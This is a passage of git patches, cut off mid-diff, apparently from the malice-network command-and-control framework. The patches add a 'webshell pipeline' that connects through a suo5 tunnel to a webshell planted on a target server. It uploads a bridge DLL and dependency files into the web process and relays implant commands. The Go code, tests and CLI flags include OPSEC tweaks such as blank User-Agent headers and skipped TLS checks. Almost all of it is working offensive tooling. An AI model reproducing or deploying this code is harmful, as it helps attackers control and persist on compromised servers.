--- server/listener/listener.go | 6 +- server/listener/webshell.go | 492 +++++++++++++++++++++++++++++++ server/listener/webshell_test.go | 201 +++++++++++++ 3 files changed, 698 insertions(+), 1 deletion(-) create mode 100644 server/listener/webshell.go create mode 100644 server/listener/webshell_test.go diff --git a/server/listener/listener.go b/server/listener/listener.go index 7ae30f25..090e87ee 100644 --- a/server/listener/listener.go +++ b/server/listener/listener.go @@ -500,7 +500,11 @@ func (lns *listener) startPipeline(pipelinepb *clientpb.Pipeline) (core.Pipeline case *clientpb.Pipeline_Http: p, err = NewHttpPipeline(lns.Rpc, pipelinepb) case *clientpb.Pipeline_Custom: - p = NewCustomPipeline(pipelinepb) + if pipelinepb.Type == "webshell" { + p, err = NewWebShellPipeline(lns.Rpc, pipelinepb) + } else { + p = NewCustomPipeline(pipelinepb) + } default: // Fallback: treat any unknown body as custom pipeline. p = NewCustomPipeline(pipelinepb) diff --git a/server/listener/webshell.go b/server/listener/webshell.go new file mode 100644 index 00000000..aecf41a1 --- /dev/null +++ b/server/listener/webshell.go @@ -0,0 +1,492 @@ +package listener + +import ( + "bytes" + "crypto/hmac" + "crypto/sha256" + "crypto/tls" + "encoding/binary" + "encoding/hex" + "encoding/json" + "fmt" + "io" + "net" + "net/http" + "net/url" + "os" + "path/filepath" + "strings" + "sync" + "time" + + "github.com/chainreactors/IoM-go/consts" + "github.com/chainreactors/IoM-go/proto/client/clientpb" + "github.com/chainreactors/IoM-go/proto/implant/implantpb" + "github.com/chainreactors/IoM-go/types" + "github.com/chainreactors/logs" + "github.com/chainreactors/malice-network/helper/encoders/hash" + "github.com/chainreactors/malice-network/server/internal/core" + "github.com/chainreactors/proxyclient/suo5" + "google.golang.org/protobuf/proto" +) + +// Stage codes for DLL bootstrap HTTP envelope. 
+const ( + wsStageLoad byte = 0x01 + wsStageStatus byte = 0x02 + wsStageInit byte = 0x03 + wsStageDeps byte = 0x06 +) + +// TLV delimiters matching malefic wire format. +const ( + tlvStart byte = 0xd1 + tlvEnd byte = 0xd2 + tlvHeaderLen = 9 // 1 (start) + 4 (sid) + 4 (len) + maxFrameSize uint32 = 10 * 1024 * 1024 +) + +// webshellParams is the JSON stored in CustomPipeline.Params. +type webshellParams struct { + Suo5URL string `json:"suo5_url"` + StageToken string `json:"stage_token,omitempty"` + DLLPath string `json:"dll_path,omitempty"` + DepsDir string `json:"deps_dir,omitempty"` +} + +// httpTransport wraps a shared http.Client with OPSEC-safe defaults. +type httpTransport struct { + client *http.Client + url string + token string +} + +func newHTTPTransport(suo5URL, token string, timeout time.Duration) *httpTransport { + return &httpTransport{ + client: &http.Client{ + Timeout: timeout, + Transport: &http.Transport{ + TLSClientConfig: &tls.Config{InsecureSkipVerify: true}, + }, + }, + url: suo5ToHTTPURL(suo5URL), + token: token, + } +} + +// do sends a body-envelope HTTP POST. +// Envelope: [1B stage][4B sid LE][1B token_len][token][payload] +// No XOR obfuscation — webshells (PHP/JSP/ASPX) parse the raw envelope directly. +func (t *httpTransport) do(stage byte, payload []byte, sid uint32) ([]byte, error) { + tok := computeBootstrapToken(t.token) + tokLen := len(tok) + if tokLen > 255 { + tokLen = 255 + tok = tok[:255] + } + + hdrLen := 6 + tokLen + buf := make([]byte, hdrLen+len(payload)) + buf[0] = stage + binary.LittleEndian.PutUint32(buf[1:5], sid) + buf[5] = byte(tokLen) + copy(buf[6:6+tokLen], tok) + copy(buf[hdrLen:], payload) + + req, err := http.NewRequest("POST", t.url, bytes.NewReader(buf)) + if err != nil { + return nil, err + } + // OPSEC: no fingerprinting headers. 
+ req.Header.Set("User-Agent", "") + req.Header.Set("Content-Type", "application/x-www-form-urlencoded") + + resp, err := t.client.Do(req) + if err != nil { + return nil, err + } + defer resp.Body.Close() + + body, err := io.ReadAll(resp.Body) + if err != nil { + return nil, err + } + if resp.StatusCode != http.StatusOK { + return nil, fmt.Errorf("HTTP %d: %s", resp.StatusCode, string(body)) + } + return body, nil +} + +func NewWebShellPipeline(rpc bindRPCClient, pipeline *clientpb.Pipeline) (*WebShellPipeline, error) { + custom := pipeline.GetCustom() + if custom == nil { + return nil, fmt.Errorf("webshell pipeline missing custom body") + } + + var params webshellParams + if custom.Params != "" { + if err := json.Unmarshal([]byte(custom.Params), ¶ms); err != nil { + return nil, fmt.Errorf("parse webshell params: %w", err) + } + } + if params.Suo5URL == "" && custom.Host != "" { + params.Suo5URL = custom.Host + } + if params.Suo5URL == "" { + return nil, fmt.Errorf("webshell pipeline requires suo5_url") + } + + return &WebShellPipeline{ + rpc: rpc, + Name: pipeline.Name, + ListenerID: pipeline.ListenerId, + Enable: pipeline.Enable, + Suo5URL: params.Suo5URL, + StageToken: params.StageToken, + DLLPath: params.DLLPath, + DepsDir: params.DepsDir, + transport: newHTTPTransport(params.Suo5URL, params.StageToken, 30*time.Second), + pipeline: pipeline, + }, nil +} + +type WebShellPipeline struct { + rpc bindRPCClient + Name string + ListenerID string + Enable bool + Suo5URL string + StageToken string + DLLPath string + DepsDir string + + transport *httpTransport + sessions sync.Map // rawID(uint32) → *webshellSession + pipeline *clientpb.Pipeline +} + +type webshellSession struct { + conn net.Conn + rawID uint32 + mu sync.Mutex +} + +func (p *WebShellPipeline) ID() string { return p.Name } + +func (p *WebShellPipeline) ToProtobuf() *clientpb.Pipeline { return p.pipeline } + +func (p *WebShellPipeline) Start() error { + p.Enable = true + forward, err := 
core.NewForward(p.rpc, p) + if err != nil { + return err + } + forward.ListenerId = p.ListenerID + core.Forwarders.Add(forward) + + logs.Log.Infof("[pipeline] starting WebShell pipeline %s -> %s", p.Name, p.Suo5URL) + core.GoGuarded("webshell-handler:"+p.Name, p.handler, p.runtimeErrorHandler("handler loop")) + return nil +} + +func (p *WebShellPipeline) Close() error { + p.Enable = false + p.sessions.Range(func(key, value interface{}) bool { + sess := value.(*webshellSession) + sess.conn.Close() + p.sessions.Delete(key) + return true + }) + return nil +} + +// handler is the main loop receiving SpiteRequests from the server via Forward. +func (p *WebShellPipeline) handler() error { + defer logs.Log.Debugf("webshell pipeline %s handler exit", p.Name) + for { + forward := core.Forwarders.Get(p.ID()) + if forward == nil { + return fmt.Errorf("webshell pipeline %s forwarder missing", p.Name) + } + msg, err := forward.Stream.Recv() + if err != nil { + return fmt.Errorf("webshell pipeline %s recv: %w", p.Name, err) + } + core.GoGuarded("webshell-request:"+p.Name, func() error { + return p.handlerReq(msg) + }, core.LogGuardedError("webshell-request:"+p.Name)) + } +} + +// handlerReq dispatches a single SpiteRequest. ModuleInit triggers DLL bootstrap +// and suo5 channel setup; everything else is forwarded to the session conn. +func (p *WebShellPipeline) handlerReq(req *clientpb.SpiteRequest) error { + rawID := req.Session.RawId + + if req.Spite.Name == consts.ModuleInit { + return p.initSession(rawID) + } + + val, ok := p.sessions.Load(rawID) + if !ok { + return fmt.Errorf("session %d not found", rawID) + } + sess := val.(*webshellSession) + + spites := &implantpb.Spites{Spites: []*implantpb.Spite{req.Spite}} + sess.mu.Lock() + err := writeFrame(sess.conn, spites, sess.rawID) + sess.mu.Unlock() + return err +} + +// initSession bootstraps DLL, dials suo5, registers session, starts readLoop. 
+func (p *WebShellPipeline) initSession(rawID uint32) error { + if p.DepsDir != "" { + if err := p.deliverDeps(); err != nil { + logs.Log.Warnf("deliver deps: %v", err) + } + } + + reg, sid, err := p.bootstrapDLL() + if err != nil { + return fmt.Errorf("bootstrap DLL: %w", err) + } + + conn, err := p.dialSuo5() + if err != nil { + return fmt.Errorf("dial suo5: %w", err) + } + + sess := &webshellSession{conn: conn, rawID: sid} + p.sessions.Store(sid, sess) + + regSpite, _ := types.BuildSpite(&implantpb.Spite{ + Name: types.MsgRegister.String(), + }, reg) + + sessionID := hash.Md5Hash([]byte(fmt.Sprintf("%d", sid))) + core.Forwarders.Send(p.ID(), &core.Message{ + Spites: &implantpb.Spites{Spites: []*implantpb.Spite{regSpite}}, + SessionID: sessionID, + RawID: sid, + }) + + core.GoGuarded( + fmt.Sprintf("webshell-readloop:%s:%d", p.Name, sid), + func() error { return p.readLoop(sess, sessionID) }, + core.LogGuardedError(fmt.Sprintf("webshell-readloop:%s:%d", p.Name, sid)), + ) + + logs.Log.Importantf("[webshell] session %d registered via %s", sid, p.Suo5URL) + return nil +} + +// readLoop reads TLV frames from suo5 conn and forwards to server. +func (p *WebShellPipeline) readLoop(sess *webshellSession, sessionID string) error { + defer func() { + sess.conn.Close() + p.sessions.Delete(sess.rawID) + logs.Log.Debugf("[webshell] readLoop exit for session %d", sess.rawID) + }() + for { + spites, err := readFrame(sess.conn) + if err != nil { + return fmt.Errorf("session %d read: %w", sess.rawID, err) + } + core.Forwarders.Send(p.ID(), &core.Message{ + Spites: spites, + SessionID: sessionID, + RawID: sess.rawID, + }) + } +} + +// bootstrapDLL performs status check, DLL load if needed, and init handshake. 
+func (p *WebShellPipeline) bootstrapDLL() (*implantpb.Register, uint32, error) { + statusBody, err := p.transport.do(wsStageStatus, nil, 0) + if err != nil { + return nil, 0, fmt.Errorf("status check: %w", err) + } + + ready := false + text := strings.TrimSpace(string(statusBody)) + if len(text) > 0 && text[0] == '{' { + var sr struct{ Ready bool } + if json.Unmarshal([]byte(text), &sr) == nil { + ready = sr.Ready + } + } else if text == "LOADED" { + ready = true + } + + if !ready && p.DLLPath != "" { + dllBytes, err := os.ReadFile(p.DLLPath) + if err != nil { + return nil, 0, fmt.Errorf("read DLL %s: %w", p.DLLPath, err) + } + if _, err = p.transport.do(wsStageLoad, dllBytes, 0); err != nil { + return nil, 0, fmt.Errorf("load DLL: %w", err) + } + logs.Log.Infof("[webshell] DLL loaded to %s", p.transport.url) + } else if !ready { + return nil, 0, fmt.Errorf("DLL not loaded and no --dll path provided") + } + + body, err := p.transport.do(wsStageInit, nil, 0) + if err != nil { + return nil, 0, fmt.Errorf("init: %w", err) + } + if len(body) < 4 { + return nil, 0, fmt.Errorf("init response too short: %d bytes", len(body)) + } + + sid := binary.LittleEndian.Uint32(body[:4]) + reg := &implantpb.Register{} + if err := proto.Unmarshal(body[4:], reg); err != nil { + return nil, 0, fmt.Errorf("unmarshal register: %w", err) + } + return reg, sid, nil +} + +func (p *WebShellPipeline) deliverDeps() error { + entries, err := os.ReadDir(p.DepsDir) + if err != nil { + return err + } + + for _, entry := range entries { + if entry.IsDir() { + continue + } + data, err := os.ReadFile(filepath.Join(p.DepsDir, entry.Name())) + if err != nil { + return fmt.Errorf("read dep %s: %w", entry.Name(), err) + } + depName := entry.Name() + if !strings.HasPrefix(depName, ".") { + depName = "." 
+ depName + } + nameBytes := []byte(depName) + if len(nameBytes) > 255 { + nameBytes = nameBytes[:255] + } + payload := make([]byte, 1+len(nameBytes)+len(data)) + payload[0] = byte(len(nameBytes)) + copy(payload[1:1+len(nameBytes)], nameBytes) + copy(payload[1+len(nameBytes):], data) + + if _, err = p.transport.do(wsStageDeps, payload, 0); err != nil { + return fmt.Errorf("deliver dep %s: %w", entry.Name(), err) + } + logs.Log.Debugf("[webshell] dep delivered: %s", entry.Name()) + } + return nil +} + +func (p *WebShellPipeline) dialSuo5() (net.Conn, error) { + u, err := url.Parse(p.Suo5URL) + if err != nil { + return nil, fmt.Errorf("parse suo5 url: %w", err) + } + conf, err := suo5.NewConfFromURL(u) + if err != nil { + return nil, fmt.Errorf("suo5 config: %w", err) + } + if string(conf.Mode) == "half" { + return nil, fmt.Errorf("suo5 detected half-duplex mode; webshell bridge requires full-duplex (target may be behind a buffering reverse proxy)") + } + client := &suo5.Suo5Client{Proxy: u, Conf: conf} + conn, err := client.Dial("tcp", "bridge:0") + if err != nil { + return nil, fmt.Errorf("suo5 dial: %w", err) + } + return conn, nil +} + +func (p *WebShellPipeline) runtimeErrorHandler(scope string) core.GoErrorHandler { + label := fmt.Sprintf("webshell pipeline %s %s", p.Name, scope) + return core.CombineErrorHandlers( + core.LogGuardedError(label), + func(err error) { + p.Enable = false + if core.EventBroker != nil { + core.EventBroker.Publish(core.Event{ + EventType: consts.EventListener, + Op: consts.CtrlPipelineStop, + Listener: &clientpb.Listener{Id: p.ListenerID}, + Message: label, + Err: core.ErrorText(err), + Important: true, + }) + } + }, + ) +} + +// --- TLV frame protocol: [0xd1][4B sid LE][4B len LE][data][0xd2] --- + +func writeFrame(conn net.Conn, spites *implantpb.Spites, sid uint32) error { + data, err := proto.Marshal(spites) + if err != nil { + return err + } + buf := make([]byte, tlvHeaderLen+len(data)+1) + buf[0] = tlvStart + 
binary.LittleEndian.PutUint32(buf[1:5], sid) + binary.LittleEndian.PutUint32(buf[5:9], uint32(len(data))) + copy(buf[tlvHeaderLen:], data) + buf[len(buf)-1] = tlvEnd + _, err = conn.Write(buf) + return err +} + +func readFrame(conn net.Conn) (*implantpb.Spites, error) { + var hdr [tlvHeaderLen]byte + if _, err := io.ReadFull(conn, hdr[:]); err != nil { + return nil, err + } + if hdr[0] != tlvStart { + return nil, fmt.Errorf("invalid TLV start: 0x%02x", hdr[0]) + } + length := binary.LittleEndian.Uint32(hdr[5:9]) + if length > maxFrameSize { + return nil, fmt.Errorf("frame too large: %d bytes", length) + } + // +1 for end delimiter + payload := make([]byte, length+1) + if _, err := io.ReadFull(conn, payload); err != nil { + return nil, err + } + if payload[length] != tlvEnd { + return nil, fmt.Errorf("invalid TLV end: 0x%02x", payload[length]) + } + spites := &implantpb.Spites{} + if err := proto.Unmarshal(payload[:length], spites); err != nil { + return nil, err + } + return spites, nil +} + +// --- Helpers --- + +func computeBootstrapToken(secret string) string { + if secret == "" { + return "" + } + if len(secret) <= 32 { + return secret + } + window := time.Now().Unix() / 30 + mac := hmac.New(sha256.New, []byte(secret)) + _ = binary.Write(mac, binary.BigEndian, window) + return hex.EncodeToString(mac.Sum(nil)) +} + +func suo5ToHTTPURL(suo5URL string) string { + s := strings.TrimSpace(suo5URL) + s = strings.Replace(s, "suo5s://", "https://", 1) + s = strings.Replace(s, "suo5://", "http://", 1) + return s +} + diff --git a/server/listener/webshell_test.go b/server/listener/webshell_test.go new file mode 100644 index 00000000..2492d212 --- /dev/null +++ b/server/listener/webshell_test.go @@ -0,0 +1,201 @@ +package listener + +import ( + "encoding/binary" + "io" + "net" + "net/http" + "net/http/httptest" + "testing" + "time" + + "github.com/chainreactors/IoM-go/proto/implant/implantpb" + "google.golang.org/protobuf/proto" +) + +func TestWriteReadFrameTLV(t 
*testing.T) { + server, client := net.Pipe() + defer server.Close() + defer client.Close() + + want := &implantpb.Spites{ + Spites: []*implantpb.Spite{ + {Name: "test_cmd", TaskId: 42}, + }, + } + + errCh := make(chan error, 1) + go func() { + errCh <- writeFrame(server, want, 1234) + }() + + got, err := readFrame(client) + if err != nil { + t.Fatalf("readFrame: %v", err) + } + if writeErr := <-errCh; writeErr != nil { + t.Fatalf("writeFrame: %v", writeErr) + } + + if len(got.Spites) != 1 { + t.Fatalf("spite count = %d, want 1", len(got.Spites)) + } + if got.Spites[0].Name != "test_cmd" { + t.Fatalf("spite name = %q, want %q", got.Spites[0].Name, "test_cmd") + } + if got.Spites[0].TaskId != 42 { + t.Fatalf("task_id = %d, want 42", got.Spites[0].TaskId) + } +} + +func TestWriteFrameTLVWireFormat(t *testing.T) { + server, client := net.Pipe() + defer server.Close() + defer client.Close() + + spites := &implantpb.Spites{ + Spites: []*implantpb.Spite{{Name: "ping"}}, + } + var sid uint32 = 0xDEAD + + go writeFrame(server, spites, sid) + + // Read raw bytes to verify TLV wire format. + var hdr [tlvHeaderLen]byte + if _, err := io.ReadFull(client, hdr[:]); err != nil { + t.Fatalf("read header: %v", err) + } + + if hdr[0] != tlvStart { + t.Fatalf("start delimiter = 0x%02x, want 0x%02x", hdr[0], tlvStart) + } + gotSid := binary.LittleEndian.Uint32(hdr[1:5]) + if gotSid != sid { + t.Fatalf("sid = %d, want %d", gotSid, sid) + } + + dataLen := binary.LittleEndian.Uint32(hdr[5:9]) + data, _ := proto.Marshal(spites) + if dataLen != uint32(len(data)) { + t.Fatalf("frame length = %d, want %d", dataLen, len(data)) + } + + // Read payload + end delimiter. 
+ payload := make([]byte, dataLen+1) + if _, err := io.ReadFull(client, payload); err != nil { + t.Fatalf("read payload: %v", err) + } + if payload[dataLen] != tlvEnd { + t.Fatalf("end delimiter = 0x%02x, want 0x%02x", payload[dataLen], tlvEnd) + } +} + +func TestReadFrameInvalidStart(t *testing.T) { + server, client := net.Pipe() + defer server.Close() + defer client.Close() + + go func() { + // Write garbage header. + buf := make([]byte, tlvHeaderLen) + buf[0] = 0xFF + server.Write(buf) + }() + + _, err := readFrame(client) + if err == nil { + t.Fatal("expected error for invalid start delimiter") + } +} + +func TestSuo5ToHTTPURL(t *testing.T) { + tests := []struct { + input string + want string + }{ + {"suo5://target/bridge.php", "http://target/bridge.php"}, + {"suo5s://target/bridge.php", "https://target/bridge.php"}, + {"suo5://10.0.0.1:8080/shell.jsp", "http://10.0.0.1:8080/shell.jsp"}, + } + for _, tt := range tests { + got := suo5ToHTTPURL(tt.input) + if got != tt.want { + t.Errorf("suo5ToHTTPURL(%q) = %q, want %q", tt.input, got, tt.want) + } + } +} + +func TestComputeBootstrapToken(t *testing.T) { + if got := computeBootstrapToken(""); got != "" { + t.Fatalf("empty secret = %q, want empty", got) + } + if got := computeBootstrapToken("short"); got != "short" { + t.Fatalf("short secret = %q, want %q", got, "short") + } + got := computeBootstrapToken("this-is-a-very-long-secret-that-exceeds-32-characters") + if len(got) != 64 { + t.Fatalf("HMAC token length = %d, want 64", len(got)) + } +} + +func TestNewWebShellPipelineMissingParams(t *testing.T) { + _, err := NewWebShellPipeline(nil, nil) + if err == nil { + t.Fatal("expected error for nil pipeline") + } +} + +func TestHTTPTransportOPSECHeaders(t *testing.T) { + var gotUA, gotCT string + ts := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + gotUA = r.Header.Get("User-Agent") + gotCT = r.Header.Get("Content-Type") + w.WriteHeader(http.StatusOK) + w.Write([]byte("OK")) + 
})) + defer ts.Close() + + transport := &httpTransport{ + client: ts.Client(), + url: ts.URL, + token: "", + } + + _, err := transport.do(wsStageStatus, nil, 0) + if err != nil { + t.Fatalf("transport.do: %v", err) + } + + if gotUA != "" { + t.Errorf("User-Agent = %q, want empty", gotUA) + } + if gotCT != "application/x-www-form-urlencoded" { + t.Errorf("Content-Type = %q, want application/x-www-form-urlencoded", gotCT) + } +} + +func TestHTTPTransportPlaintextEnvelope(t *testing.T) { + token := "my-secret-token" + var receivedBody []byte + + ts := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + receivedBody, _ = io.ReadAll(r.Body) + w.WriteHeader(http.StatusOK) + w.Write([]byte("OK")) + })) + defer ts.Close() + + transport := newHTTPTransport("suo5://unused", token, 5*time.Second) + transport.client = ts.Client() + transport.url = ts.URL + + _, err := transport.do(wsStageStatus, []byte("test"), 0) + if err != nil { + t.Fatalf("transport.do: %v", err) + } + + // Envelope is plaintext: first byte must be the raw stage code. + if len(receivedBody) == 0 || receivedBody[0] != wsStageStatus { + t.Errorf("first byte = 0x%02x, want 0x%02x (plaintext stage)", receivedBody[0], wsStageStatus) + } +} From 243a0ef1139d53e8d6c627b843492b46558a143b Mon Sep 17 00:00:00 2001 From: wuchulonly <1746825356@qq.com> Date: Mon, 23 Mar 2026 04:16:14 +0800 Subject: [PATCH 17/19] refactor(pipeline): update webshell commands for suo5 transport Replace bridge-binary-oriented client commands with suo5-backed params. Add --suo5, --token, --dll, --deps flags; store params as JSON in CustomPipeline.Params; remove resolveWebShellListenerHost and bridge hints. 
--- client/command/pipeline/commands.go | 16 +++-- client/command/pipeline/webshell.go | 69 ++++++++++------------ client/command/pipeline/webshell_test.go | 75 +++++++++++------------- 3 files changed, 76 insertions(+), 84 deletions(-) diff --git a/client/command/pipeline/commands.go b/client/command/pipeline/commands.go index c17a97ed..8d87ab6e 100644 --- a/client/command/pipeline/commands.go +++ b/client/command/pipeline/commands.go @@ -264,24 +264,32 @@ rem update interval --pipeline-id rem_graph_api_03 --agent-id uDM0BgG6 5000 newWebShellCmd := &cobra.Command{ Use: "new [name]", - Short: "Register a new webshell pipeline", - Long: "Register a CustomPipeline(type=webshell) for the webshell-bridge binary to connect to.", + Short: "Register a new webshell pipeline with suo5 transport", + Long: "Register a WebShell pipeline that uses suo5 for full-duplex streaming to the target webshell.", Args: cobra.MaximumNArgs(1), RunE: func(cmd *cobra.Command, args []string) error { return NewWebShellCmd(cmd, con) }, Example: `~~~ -webshell new --listener my-listener -webshell new ws1 --listener my-listener +webshell new --listener my-listener --suo5 suo5://target/bridge.php --token secret +webshell new ws1 --listener my-listener --suo5 suo5://target/bridge.php --token secret --dll /path/to/dll ~~~`, } common.BindFlag(newWebShellCmd, func(f *pflag.FlagSet) { f.StringP("listener", "l", "", "listener id") + f.String("suo5", "", "suo5 URL to webshell (e.g., suo5://target/bridge.php)") + f.String("token", "", "stage token for DLL bootstrap authentication") + f.String("dll", "", "path to bridge DLL for auto-loading") + f.String("deps", "", "directory containing dependency files (e.g., jna.jar)") }) common.BindFlagCompletions(newWebShellCmd, func(comp carapace.ActionMap) { comp["listener"] = common.ListenerIDCompleter(con) + comp["suo5"] = carapace.ActionValues().Usage("suo5 URL") + comp["dll"] = carapace.ActionFiles().Usage("bridge DLL path") + comp["deps"] = 
carapace.ActionDirectories().Usage("deps directory") }) newWebShellCmd.MarkFlagRequired("listener") + newWebShellCmd.MarkFlagRequired("suo5") startWebShellCmd := &cobra.Command{ Use: "start ", diff --git a/client/command/pipeline/webshell.go b/client/command/pipeline/webshell.go index 692a290e..bc1410af 100644 --- a/client/command/pipeline/webshell.go +++ b/client/command/pipeline/webshell.go @@ -1,6 +1,7 @@ package pipeline import ( + "encoding/json" "fmt" "github.com/chainreactors/IoM-go/proto/client/clientpb" @@ -11,6 +12,14 @@ import ( const webshellPipelineType = "webshell" +// webshellParams mirrors the server-side struct for JSON serialization. +type webshellCmdParams struct { + Suo5URL string `json:"suo5_url"` + StageToken string `json:"stage_token,omitempty"` + DLLPath string `json:"dll_path,omitempty"` + DepsDir string `json:"deps_dir,omitempty"` +} + // ListWebShellCmd lists all webshell pipelines for a given listener. func ListWebShellCmd(cmd *cobra.Command, con *core.Console) error { listenerID := cmd.Flags().Arg(0) @@ -39,19 +48,33 @@ func ListWebShellCmd(cmd *cobra.Command, con *core.Console) error { return nil } -// NewWebShellCmd registers a new webshell pipeline using the CustomPipeline mechanism. -// The actual bridge binary (webshell-bridge) connects to this pipeline externally. +// NewWebShellCmd registers a new webshell pipeline backed by suo5 transport. 
func NewWebShellCmd(cmd *cobra.Command, con *core.Console) error { name := cmd.Flags().Arg(0) listenerID, _ := cmd.Flags().GetString("listener") + suo5URL, _ := cmd.Flags().GetString("suo5") + token, _ := cmd.Flags().GetString("token") + dllPath, _ := cmd.Flags().GetString("dll") + depsDir, _ := cmd.Flags().GetString("deps") if listenerID == "" { return fmt.Errorf("listener id is required") } + if suo5URL == "" { + return fmt.Errorf("--suo5 URL is required (e.g., suo5://target/bridge.php)") + } if name == "" { name = fmt.Sprintf("webshell_%s", listenerID) } + params := webshellCmdParams{ + Suo5URL: suo5URL, + StageToken: token, + DLLPath: dllPath, + DepsDir: depsDir, + } + paramsJSON, _ := json.Marshal(params) + pipeline := &clientpb.Pipeline{ Name: name, ListenerId: listenerID, @@ -61,16 +84,15 @@ func NewWebShellCmd(cmd *cobra.Command, con *core.Console) error { Custom: &clientpb.CustomPipeline{ Name: name, ListenerId: listenerID, - Host: resolveWebShellListenerHost(con, listenerID), + Params: string(paramsJSON), }, }, } _, err := con.Rpc.RegisterPipeline(con.Context(), pipeline) if err != nil { - return webShellBridgeHint(listenerID, fmt.Errorf("register webshell pipeline %s: %w", name, err)) + return fmt.Errorf("register webshell pipeline %s: %w", name, err) } - con.Log.Importantf("WebShell pipeline %s registered\n", name) _, err = con.Rpc.StartPipeline(con.Context(), &clientpb.CtrlPipeline{ @@ -79,12 +101,10 @@ func NewWebShellCmd(cmd *cobra.Command, con *core.Console) error { Pipeline: pipeline, }) if err != nil { - return webShellBridgeHint(listenerID, fmt.Errorf("start webshell pipeline %s: %w", name, err)) + return fmt.Errorf("start webshell pipeline %s: %w", name, err) } - con.Log.Importantf("WebShell pipeline %s started\n", name) - con.Log.Infof("The bridge should already be running for listener %s and waiting on pipeline control.\n", listenerID) - con.Log.Infof("If the DLL is not loaded yet, the bridge will keep retrying until the rem server becomes 
reachable.\n") + con.Log.Importantf("WebShell pipeline %s started (suo5: %s)\n", name, suo5URL) return nil } @@ -96,13 +116,12 @@ func StartWebShellCmd(cmd *cobra.Command, con *core.Console) error { if err != nil { return err } - listenerID = pipeline.GetListenerId() _, err = con.Rpc.StartPipeline(con.Context(), &clientpb.CtrlPipeline{ Name: name, - ListenerId: listenerID, + ListenerId: pipeline.GetListenerId(), }) if err != nil { - return webShellBridgeHint(listenerID, fmt.Errorf("start webshell pipeline %s: %w", name, err)) + return fmt.Errorf("start webshell pipeline %s: %w", name, err) } con.Log.Importantf("WebShell pipeline %s started\n", name) return nil @@ -146,25 +165,6 @@ func DeleteWebShellCmd(cmd *cobra.Command, con *core.Console) error { return nil } -func resolveWebShellListenerHost(con *core.Console, listenerID string) string { - if listenerID == "" || con == nil { - return "" - } - if listener, ok := con.Listeners[listenerID]; ok && listener.GetIp() != "" { - return listener.GetIp() - } - listeners, err := con.Rpc.GetListeners(con.Context(), &clientpb.Empty{}) - if err != nil { - return "" - } - for _, listener := range listeners.GetListeners() { - if listener.GetId() == listenerID { - return listener.GetIp() - } - } - return "" -} - func resolveWebShellPipeline(con *core.Console, name, listenerID string) (*clientpb.Pipeline, error) { if name == "" { return nil, fmt.Errorf("webshell pipeline name is required") @@ -204,10 +204,3 @@ func resolveWebShellPipeline(con *core.Console, name, listenerID string) (*clien } return match, nil } - -func webShellBridgeHint(listenerID string, err error) error { - if listenerID == "" { - return err - } - return fmt.Errorf("%w; start webshell-bridge for listener %s first", err, listenerID) -} diff --git a/client/command/pipeline/webshell_test.go b/client/command/pipeline/webshell_test.go index 4234ff58..864cd34c 100644 --- a/client/command/pipeline/webshell_test.go +++ b/client/command/pipeline/webshell_test.go @@ 
-2,6 +2,7 @@ package pipeline_test import ( "context" + "encoding/json" "errors" "strings" "testing" @@ -12,14 +13,10 @@ import ( "github.com/spf13/cobra" ) -func TestNewWebShellCmdUsesCachedListenerHost(t *testing.T) { +func TestNewWebShellCmdStoresParamsInCustomPipeline(t *testing.T) { h := testsupport.NewClientHarness(t) - h.Console.Listeners["listener-a"] = &clientpb.Listener{ - Id: "listener-a", - Ip: "10.10.10.10", - } - cmd := newWebShellTestCommand(t, "--listener", "listener-a", "ws-a") + cmd := newWebShellTestCommand(t, "--listener", "listener-a", "--suo5", "suo5://target/bridge.php", "--token", "secret123", "ws-a") if err := pipelinecmd.NewWebShellCmd(cmd, h.Console); err != nil { t.Fatalf("NewWebShellCmd failed: %v", err) } @@ -36,64 +33,54 @@ func TestNewWebShellCmdUsesCachedListenerHost(t *testing.T) { if !ok { t.Fatalf("register request type = %T, want *clientpb.Pipeline", calls[0].Request) } + if req.Type != "webshell" { + t.Fatalf("pipeline type = %q, want %q", req.Type, "webshell") + } custom, ok := req.Body.(*clientpb.Pipeline_Custom) if !ok { t.Fatalf("register pipeline body = %T, want *clientpb.Pipeline_Custom", req.Body) } - if custom.Custom.GetHost() != "10.10.10.10" { - t.Fatalf("custom host = %q, want %q", custom.Custom.GetHost(), "10.10.10.10") - } -} -func TestNewWebShellCmdFallsBackToGetListenersForHost(t *testing.T) { - h := testsupport.NewClientHarness(t) - h.Recorder.OnListeners("GetListeners", func(_ context.Context, _ any) (*clientpb.Listeners, error) { - return &clientpb.Listeners{ - Listeners: []*clientpb.Listener{{ - Id: "listener-b", - Ip: "192.0.2.15", - }}, - }, nil - }) - - cmd := newWebShellTestCommand(t, "--listener", "listener-b", "ws-b") - if err := pipelinecmd.NewWebShellCmd(cmd, h.Console); err != nil { - t.Fatalf("NewWebShellCmd failed: %v", err) + var params struct { + Suo5URL string `json:"suo5_url"` + StageToken string `json:"stage_token"` } - - calls := h.Recorder.Calls() - if len(calls) != 3 { - t.Fatalf("call 
count = %d, want 3", len(calls))
+	}
-	if calls[0].Method != "GetListeners" {
-		t.Fatalf("first method = %s, want GetListeners", calls[0].Method)
+	if err := json.Unmarshal([]byte(custom.Custom.Params), &params); err != nil {
+		t.Fatalf("unmarshal params: %v", err)
 	}
-	req, ok := calls[1].Request.(*clientpb.Pipeline)
-	if !ok {
-		t.Fatalf("register request type = %T, want *clientpb.Pipeline", calls[1].Request)
+	if params.Suo5URL != "suo5://target/bridge.php" {
+		t.Fatalf("suo5_url = %q, want %q", params.Suo5URL, "suo5://target/bridge.php")
 	}
-	custom, ok := req.Body.(*clientpb.Pipeline_Custom)
-	if !ok {
-		t.Fatalf("register pipeline body = %T, want *clientpb.Pipeline_Custom", req.Body)
+	if params.StageToken != "secret123" {
+		t.Fatalf("stage_token = %q, want %q", params.StageToken, "secret123")
+	}
+}
+
+func TestNewWebShellCmdRequiresSuo5Flag(t *testing.T) {
+	h := testsupport.NewClientHarness(t)
+	cmd := newWebShellTestCommand(t, "--listener", "listener-b", "ws-b")
+	err := pipelinecmd.NewWebShellCmd(cmd, h.Console)
+	if err == nil {
+		t.Fatal("NewWebShellCmd error = nil, want error")
 	}
-	if custom.Custom.GetHost() != "192.0.2.15" {
-		t.Fatalf("custom host = %q, want %q", custom.Custom.GetHost(), "192.0.2.15")
+	if !strings.Contains(err.Error(), "--suo5") {
+		t.Fatalf("error = %q, want suo5 requirement", err)
 	}
 }
 
-func TestNewWebShellCmdWrapsRegisterErrorWithBridgeHint(t *testing.T) {
